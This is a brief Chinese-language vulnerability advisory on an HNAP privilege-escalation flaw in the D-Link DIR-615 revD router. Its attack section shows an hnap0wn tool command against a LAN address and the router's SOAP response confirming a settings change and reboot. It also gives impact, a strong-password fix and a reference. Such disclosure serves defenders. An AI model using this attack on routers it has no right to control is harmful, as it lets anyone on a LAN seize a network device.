D-Link DIR-615 revD HNAP Vulnerability
漏洞概述
DIR-615 revD路由器在实现HNAP(家庭网络管理协议)时存在缺陷,导致经常被忽视的普通用户可以执行管理员操作,如修改管理员密码。
影响版本
DIR-615 revD UK V4.11
攻击方式
使用hnap0wn工具攻击
$ ./hnap0wn 192.168.0.1 xml/SetDeviceSettings.xml Trying SOAPAction header exploit... SOAPAction header exploit failed! Trying privilege escalation exploit...
<?xml version='1.0' encoding='utf-8'?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <SetDeviceSettingsResponse xmlns="http://purenetworks.com/HNAP1/"> <SetDeviceSettingsResult>REBOOT</SetDeviceSettingsResult> </SetDeviceSettingsResponse> </soap:Body> </soap:Envelope>
漏洞影响
默认密码或弱口令用户,LAN内网所有人都可以控制路由器
漏洞修复
设置强密码
参考资料
http://www.devttys0.com/wp-content/uploads/2010/12/dir615_revD_uk_hnap.pdf